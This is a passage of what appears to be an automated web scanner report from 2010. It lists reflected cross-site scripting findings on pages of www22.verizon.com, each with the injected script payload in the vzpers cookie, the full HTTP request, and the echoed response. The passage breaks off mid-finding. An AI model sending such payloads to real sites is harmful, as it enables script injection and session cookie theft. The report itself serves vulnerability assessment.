Content-Type: text/html; charset=utf-8
Content-Length: 183511
Expires: Mon, 13 Dec 2010 00:56:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:51 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="https://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compati
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX89205<SCRIPT>ALERT(1)</SCRIPT>0B121ED9D50 </DIV>
...[SNIP]...

1.89. http://www22.verizon.com/Residential/HighSpeedInternet/Features/Features.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Features/Features.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2c7b3'><script>alert(1)</script>3c15a62b74 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX2c7b3'><script>alert(1)</script>3c15a62b74; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 183519
Expires: Mon, 13 Dec 2010 00:56:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:56:41 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:56:41 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns="https://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compati
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2C7B3'><SCRIPT>ALERT(1)</SCRIPT>3C15A62B74 ' />
...[SNIP]...

1.90. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 9dc5a<script>alert(1)</script>ffaee59f41a was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX9dc5a<script>alert(1)</script>ffaee59f41a; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 521977
Expires: Mon, 13 Dec 2010 01:01:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:01:02 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:01:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:01:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:01:02 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9DC5A<SCRIPT>ALERT(1)</SCRIPT>FFAEE59F41A </DIV>
...[SNIP]...

1.91. http://www22.verizon.com/Residential/HighSpeedInternet/Plans/Plans.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HighSpeedInternet/Plans/Plans.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b0566'><script>alert(1)</script>3b4fc694588 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXb0566'><script>alert(1)</script>3b4fc694588; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 521995
Expires: Mon, 13 Dec 2010 01:00:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:44 GMT
Connection: close
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:44 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:44 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB0566'><SCRIPT>ALERT(1)</SCRIPT>3B4FC694588 ' />
...[SNIP]...

1.92. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64fe6'><script>alert(1)</script>4105d1be929 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX64fe6'><script>alert(1)</script>4105d1be929; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70494
Expires: Mon, 13 Dec 2010 00:55:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:23 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:23 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:23 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX64FE6'><SCRIPT>ALERT(1)</SCRIPT>4105D1BE929 ' />
...[SNIP]...

1.93. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload c6090<script>alert(1)</script>3a6bd3d277f was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXc6090<script>alert(1)</script>3a6bd3d277f; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70490
Expires: Mon, 13 Dec 2010 00:55:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:23 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC6090<SCRIPT>ALERT(1)</SCRIPT>3A6BD3D277F </DIV>
...[SNIP]...

1.94. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 35690<script>alert(1)</script>38df0f9fff was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX35690<script>alert(1)</script>38df0f9fff; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70494
Expires: Mon, 13 Dec 2010 00:55:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:41 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:41 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX35690<SCRIPT>ALERT(1)</SCRIPT>38DF0F9FFF </DIV>
...[SNIP]...

1.95. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72771'><script>alert(1)</script>21ee040eba0 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX72771'><script>alert(1)</script>21ee040eba0; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70500
Expires: Mon, 13 Dec 2010 00:55:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:40 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:40 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:40 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:40 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX72771'><SCRIPT>ALERT(1)</SCRIPT>21EE040EBA0 ' />
...[SNIP]...

1.96. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload b8b66<script>alert(1)</script>610bbbdabc0 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXb8b66<script>alert(1)</script>610bbbdabc0; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78823
Expires: Mon, 13 Dec 2010 00:55:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:22 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXB8B66<SCRIPT>ALERT(1)</SCRIPT>610BBBDABC0 </DIV>
...[SNIP]...

1.97. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6dead'><script>alert(1)</script>2b717bbb720 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX6dead'><script>alert(1)</script>2b717bbb720; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78827
Expires: Mon, 13 Dec 2010 00:55:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:55:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:55:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: BTagRequired=N; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:55:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6DEAD'><SCRIPT>ALERT(1)</SCRIPT>2B717BBB720 ' />
...[SNIP]...

1.98. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
